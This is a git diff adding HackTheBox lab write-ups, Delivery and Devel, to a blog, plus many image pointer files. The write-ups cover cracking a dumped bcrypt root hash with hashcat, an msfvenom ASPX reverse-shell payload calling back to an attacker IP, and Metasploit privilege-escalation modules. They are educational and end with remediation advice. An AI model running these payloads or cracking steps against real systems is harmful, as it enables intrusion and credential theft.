| 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| 7z9izpo1wfrnddytkm8815wg4w | 1647894531289 | 1647894703010 | 0 | azerty | $2a$10$Dwc/LdQGFD0PdJrmLwD07uTbZE1CfpswRJCMsoGKeJHKtn4/LIPW. 
| NULL | | 3998604@delivery.htb | 1 | | | | | system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1647894531289 | 0 | 0 | en | {"automaticTimezone":"America/New_York","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| hatotzdacb8mbe95hm4ei8i7ny | 1609844805777 | 1609844805777 | 0 | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | NULL | | 9122359@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844805777 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| jing8rk6mjdbudcidw6wz94rdy | 1608992663664 | 1608992663664 | 0 | channelexport | | NULL | | channelexport@localhost | 0 | | Channel Export Bot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663664 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| n9magehhzincig4mm97xyft9sc | 1609844789048 | 1609844800818 | 0 | 9ecfb4be145d47fda0724f697f35ffaf | 
$2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | NULL | | 5056505@delivery.htb | 1 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844789048 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | ++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ +8 rows in set (0.000 sec) +``` +In this table I find the hash of the user, I recover it and launch `hashcat` to crack it: + + +```bash +hashcat.exe -m 3200 hash.txt pass.txt -r rules/best64.rule +hashcat (v6.2.5) starting +[...] +Hashes: 1 digests; 1 unique digests, 1 unique salts +Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates +Rules: 77 + +Optimizers applied: +* Zero-Byte +* Single-Hash +* Single-Salt + +[...] + +Dictionary cache hit: +* Filename..: pass.txt +* Passwords.: 1 +* Bytes.....: 17 +* Keyspace..: 77 + +$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 + +[...] +``` +💡To save time I switched to Windows to take advantage of the power of my GPU. 
Depending on your configuration, it can take more or less time.I find the `PleaseSubscribe!21` password so I can now change the user to root and get the last flag. + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Disable account creation on Matermost +- Do not send a clear password in conversations +- Do not use the root password on other services/for other users +- Use complex passwords diff --git a/content/writeup-ctf/writeup-devel-htb/featured.png b/content/writeup-ctf/writeup-devel-htb/featured.png new file mode 100644 index 0000000..7549676 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b07b596f0884e42218d26c85f34c5597ba8d8550c98909073c3f4ebac12fcef2 +size 264178 diff --git a/content/writeup-ctf/writeup-devel-htb/featured.webp b/content/writeup-ctf/writeup-devel-htb/featured.webp new file mode 100644 index 0000000..67e28c2 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cfcb5ec28db1d22d860b5ac6aa40d0de2c4fd7ad30ce600fb7786e28319fc968 +size 28504 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-1.png b/content/writeup-ctf/writeup-devel-htb/img/image-1.png new file mode 100644 index 0000000..b24dbdd --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9971d86a22c91e29fc54bf15b7c86f08bba62dc1223f68dd0291f3bcc4608b3 +size 34053 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-1.webp b/content/writeup-ctf/writeup-devel-htb/img/image-1.webp new file mode 100644 index 0000000..860454d --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-1.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a870b5e62fbc6a8c590b6eff3753495b978cf5cb4ecdafd75168defdf035189b +size 31926 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-2.png b/content/writeup-ctf/writeup-devel-htb/img/image-2.png new file mode 100644 index 0000000..bb55ca5 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ee4219aec1d3c4658a830d5c5695e0eb72c8527ae912e36a53d333b63f899d1 +size 270053 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-2.webp b/content/writeup-ctf/writeup-devel-htb/img/image-2.webp new file mode 100644 index 0000000..c5bfd22 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e743eb6604bbdf14cf343a8979d515bc907dc6e5bea6a051915ab2296d3b17e5 +size 22534 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-3.png b/content/writeup-ctf/writeup-devel-htb/img/image-3.png new file mode 100644 index 0000000..2da01ce --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebdfa8162e394ed0a0fb48b4375619a31cb6e0df14b037e76b98eb1d592e66cc +size 26161 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-3.webp b/content/writeup-ctf/writeup-devel-htb/img/image-3.webp new file mode 100644 index 0000000..4b97f19 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0e8cc572cd8804b21634a7fc704c1d06d0ed4292b630348add66533cb85a58d +size 28084 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-4.png b/content/writeup-ctf/writeup-devel-htb/img/image-4.png new file mode 100644 index 0000000..9449455 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-4.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ac67e6c1ef6f032b4b1b8056ed033665aeb27c46fb97a9e07d73f4f46c93f8b +size 50008 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-4.webp b/content/writeup-ctf/writeup-devel-htb/img/image-4.webp new file mode 100644 index 0000000..6eb2f6b --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba8c917a1b476e9e887170e609e6448946843d29a3471ba996fa944f5549357a +size 45758 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-5.png b/content/writeup-ctf/writeup-devel-htb/img/image-5.png new file mode 100644 index 0000000..3427ba1 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b11ea53fd4b83e13861601723e90c3360c4cda00249327c423dacf9acfe6df7 +size 67853 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-5.webp b/content/writeup-ctf/writeup-devel-htb/img/image-5.webp new file mode 100644 index 0000000..4aef72e --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:789160158ced23789b850d1bd2d8f9d8d9e21492517ba314bd988ec380ddf580 +size 81996 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-6.png b/content/writeup-ctf/writeup-devel-htb/img/image-6.png new file mode 100644 index 0000000..c75d9b8 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e07b654f84970e5efc61fbca2df742f136f6601c187cbb8839c51310f60de898 +size 14620 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-6.webp b/content/writeup-ctf/writeup-devel-htb/img/image-6.webp new file mode 100644 index 0000000..13c90ba --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-6.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eec38bdbcb6ac2f1153abb2b57dcf97b0a983802bfcd59f33492ed6703677d32 +size 15820 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-7.png b/content/writeup-ctf/writeup-devel-htb/img/image-7.png new file mode 100644 index 0000000..4210f07 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5f19166c3e44fcf3d4560e0816fb3fa6d6b6c420ee697e4d39914c1c465024e +size 36563 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-7.webp b/content/writeup-ctf/writeup-devel-htb/img/image-7.webp new file mode 100644 index 0000000..c3fa9bd --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35fe2fad9d335311e46700d95df3d15e871daad5dedc2132cf80863605df9378 +size 35924 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-8.png b/content/writeup-ctf/writeup-devel-htb/img/image-8.png new file mode 100644 index 0000000..d539953 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44aa401da6b330d9175ca299fba9c5c46400d07554b4d6baf7e66ef9ae731b3f +size 8233 diff --git a/content/writeup-ctf/writeup-devel-htb/img/image-8.webp b/content/writeup-ctf/writeup-devel-htb/img/image-8.webp new file mode 100644 index 0000000..cbf93bc --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6e6959df3fd4801b88b6a131a4ebaebde30de79c39ea6f1c7fd8db438f0e9d7 +size 11526 diff --git a/content/writeup-ctf/writeup-devel-htb/index.md b/content/writeup-ctf/writeup-devel-htb/index.md new file mode 100644 index 0000000..c62d179 --- /dev/null +++ b/content/writeup-ctf/writeup-devel-htb/index.md 
@@ -0,0 +1,101 @@ +--- +title: "Writeup - Devel (HTB)" +date: 2022-04-06 +slug: "writeup-devel-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Devel](https://app.hackthebox.com/machines/Devel) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.5 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 21/tcp : FTP (ftpd) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +I start by seeing if it is possible to connect to FTP as `anonymous`: + +![](img/image-3.webp) + +In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command: + + +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx +``` +I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter. + +![](img/image-4.webp) + +I then access my previously uploaded payload at the following address: + + +```bash +http://10.10.10.5/shell.aspx +``` +I now have a reverse shell on the machine. + +## Privilege escalation + +I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit. + + +```bash +use post/multi/recon/local_exploit_suggester +set SESSION 19 +exploit +``` +The module has found a number of potential exploits. + +![](img/image-5.webp) + +I start by testing the first one: + + +```bash +use windows/local/bypassuac_eventtvwr +set SESSION 19 +exploit +``` +![](img/image-6.webp) + +But without success. I test the second one: + + +```bash +use windows/local/ms10_015_kitrap0d +set SESSION 19 +exploit +``` +![](img/image-7.webp) + +This one worked, I now have a reverse shell with the `NT AUTHORITY\SYSTEM` authorization. + +The module `MS10_015` is linked to CVE-2010-0232. + + +> [...] 
when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] [VK9 Security](https://vk9-sec.com/kitrap0d-windows-kernel-could-allow-elevation-of-privilege-ms10-015-cve-2010-0232/) + +I can now get both flags back. + +![](img/image-8.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Disable writing to the FTP server as `anonymous` +- Update Windows to patch CVE-2010-0232 diff --git a/content/writeup-ctf/writeup-devzat-htb/featured.png b/content/writeup-ctf/writeup-devzat-htb/featured.png new file mode 100644 index 0000000..ff24998 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:144600e92936143f0fe608db542b95f4381f92909e17c643c18f6667e6f07943 +size 281336 diff --git a/content/writeup-ctf/writeup-devzat-htb/featured.webp b/content/writeup-ctf/writeup-devzat-htb/featured.webp new file mode 100644 index 0000000..3bd8615 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9808b0b466c9762b7b349334f1781988859af6841008e21c63053024b0295eae +size 31188 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-1.png b/content/writeup-ctf/writeup-devzat-htb/img/image-1.png new file mode 100644 index 0000000..b4972c1 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e15e9e79e955e6ee8a75ec685ae92f21c83e903e85a214b0f069e294f0ce9384 +size 64014 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp new file mode 100644 index 0000000..00bda40 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-1.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3cbb9260a766aa3f13ed9f97a8bea560b5bf19f6ee32afbdfad1a197ff3d8307 +size 52534 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-10.png b/content/writeup-ctf/writeup-devzat-htb/img/image-10.png new file mode 100644 index 0000000..bfee383 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:777783cd86154934fc935c9d9a67c8d20aa51cf6eee9219a42017b633246f243 +size 114335 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp new file mode 100644 index 0000000..bd5fe51 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb00365a298976759d8d69ee34e96d03202e49b29e9257fe2e25df3c64e92be1 +size 80786 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-11.png b/content/writeup-ctf/writeup-devzat-htb/img/image-11.png new file mode 100644 index 0000000..a3b4948 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf71e8c0e877da9776fe1160d0f4ce61be5edb3e08a4e64d62fecfa645e6df07 +size 58946 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp new file mode 100644 index 0000000..777c18f --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee7a8ace3ec07d9d266a45ccdcf649865acafa97d01178c801d2330d1e0513bf +size 43894 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-12.png b/content/writeup-ctf/writeup-devzat-htb/img/image-12.png new file mode 100644 index 0000000..f069773 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-12.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7c042a328f0a91533f110ee27898408da3638fadb60fd2a9539718c918b7f39 +size 18289 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp new file mode 100644 index 0000000..0e44171 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ca494592b5f6f76d699a3bbcbcbcab65fa986794854a06e113282fc55d3d374 +size 13576 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-13.png b/content/writeup-ctf/writeup-devzat-htb/img/image-13.png new file mode 100644 index 0000000..7f8cdfe --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04483aff847e9ce6169d33c2a43cd26c80b4133197e3f11d972f467fb905dc20 +size 38467 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp new file mode 100644 index 0000000..cc43837 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:989c9ac54bc2c88eb6d1df43109849fa5937e9c77ee991055fb14545b10ab920 +size 33548 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-14.png b/content/writeup-ctf/writeup-devzat-htb/img/image-14.png new file mode 100644 index 0000000..5a24ce1 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4ec696ca7c83a5a82fbdf3d9d4daa87d541ead3f75f5b283b9a0bbd8ec09f3d +size 41992 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp new file mode 100644 index 0000000..a293c27 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-14.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ac88a341dbc05c5efc31fb211e298fe37f737606a17e9d8c70023896f8d4b31 +size 36794 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-15.png b/content/writeup-ctf/writeup-devzat-htb/img/image-15.png new file mode 100644 index 0000000..e30ea8a --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd0b620e2c1049dda53d54280dada89f6f6f1957782d80ecf4bbc65b450e1da1 +size 25129 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp new file mode 100644 index 0000000..5cb06b8 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0feb3ab966750a2f236968b4be98bfebebda6cc73723db4bf0ccf9209781152d +size 20074 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-16.png b/content/writeup-ctf/writeup-devzat-htb/img/image-16.png new file mode 100644 index 0000000..68f83a8 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e08b21c2343be3b884f8ab99e101e2994a3adac370c20fd884988685436eaf63 +size 33596 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp new file mode 100644 index 0000000..3927b79 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-16.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad63e384624e7538e97b7a88636952dbd0a87527a839f0de4c915000ebe821ed +size 24386 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-17.png b/content/writeup-ctf/writeup-devzat-htb/img/image-17.png new file mode 100644 index 0000000..1a49eab --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-17.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff78724b302de739a495f8ca809cbc9f62e59138b2aaf6e41d45e755f09816d3 +size 32643 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp new file mode 100644 index 0000000..7fb0192 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-17.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8b222bc2ca11b707f370a64152da153e826586c21dde35d1af210506c3e7311 +size 24754 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-18.png b/content/writeup-ctf/writeup-devzat-htb/img/image-18.png new file mode 100644 index 0000000..1738962 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-18.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:038c2c776267e011be9fcb47391aee030af615e4c9ddc6fc4bf70f6c2494f44e +size 42126 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp new file mode 100644 index 0000000..9532dff --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-18.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23acbb9827aa67cf2acb1ada2da9b840961b8cb6a159a4d58c331c500e7b64e6 +size 26476 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-19.png b/content/writeup-ctf/writeup-devzat-htb/img/image-19.png new file mode 100644 index 0000000..1be090d --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-19.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9182ef227ee64d322a8407b0908043af2be2b30700b8b4854fab6b1e3fbe01b +size 33266 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp new file mode 100644 index 0000000..6248184 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-19.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:968437b132c627dac8667448b0078f0e218a0e9dd6d9a279e22fbb1f1bf68e54 +size 19268 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-2.png b/content/writeup-ctf/writeup-devzat-htb/img/image-2.png new file mode 100644 index 0000000..3dd4f5e --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73836c6a67e3f964d5e613f53fd535b8c3f7031622aa04eeb388720054a4c939 +size 382990 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp new file mode 100644 index 0000000..6931efb --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8761d03d1f8acf2d43242e72249a01493f8f026cbe6d053607eba739298492c +size 39704 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-20.png b/content/writeup-ctf/writeup-devzat-htb/img/image-20.png new file mode 100644 index 0000000..ae54afa --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-20.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3806d9fe10d74312281d70c149fa73d631f8ca6d5c0ac7f25fc4cda132af52fc +size 12982 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp new file mode 100644 index 0000000..bb88016 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-20.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79907fee20a0786dcdf92785d2728a3254b4bf7a532f56f4dea85644a351c014 +size 8882 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-21.png b/content/writeup-ctf/writeup-devzat-htb/img/image-21.png new file mode 100644 index 0000000..9a5b6c4 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-21.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:347087792a51be8eab6033604d223e9ae3fd18ee205ad1073b0d5dee9c9e330e +size 35576 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp new file mode 100644 index 0000000..73b93d6 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a824527393c54a6c0805395d7777aef33ac7f918bf94b790aeb843b82c6e012 +size 26130 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-22.png b/content/writeup-ctf/writeup-devzat-htb/img/image-22.png new file mode 100644 index 0000000..474eeb8 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-22.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b247084c8c45ae8f71d733c7030532759ff8b56daf800f8ea47ab553db05fc7 +size 9860 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp new file mode 100644 index 0000000..5694eb4 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a0413d88641f2db9d8dd5bcf80222f6180cbf9012553701646bb1324f86931c +size 6848 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-23.png b/content/writeup-ctf/writeup-devzat-htb/img/image-23.png new file mode 100644 index 0000000..c837761 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-23.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83ed834e79aa733ddf2317c01d03d6f7b7a7306e8ea64154d0526a11d0ca0033 +size 59786 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp new file mode 100644 index 0000000..b7b550e --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0ee133c38cf87a1e9dfe5695b8c932d12927e1d8c30c8d4c1aacf4162532f11 +size 43230 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-24.png b/content/writeup-ctf/writeup-devzat-htb/img/image-24.png new file mode 100644 index 0000000..903539f --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-24.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6cc84579e803eb28b1f9b69971174b0d20fddc242f0d3b62911cd0db1ee351e +size 46238 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp new file mode 100644 index 0000000..0b75384 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:907a08df1efd938e695d158e1d8113ca552c67b3babbad6d2cd0b407de81235c +size 35912 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-25.png b/content/writeup-ctf/writeup-devzat-htb/img/image-25.png new file mode 100644 index 0000000..323f91f --- /dev/null +++ 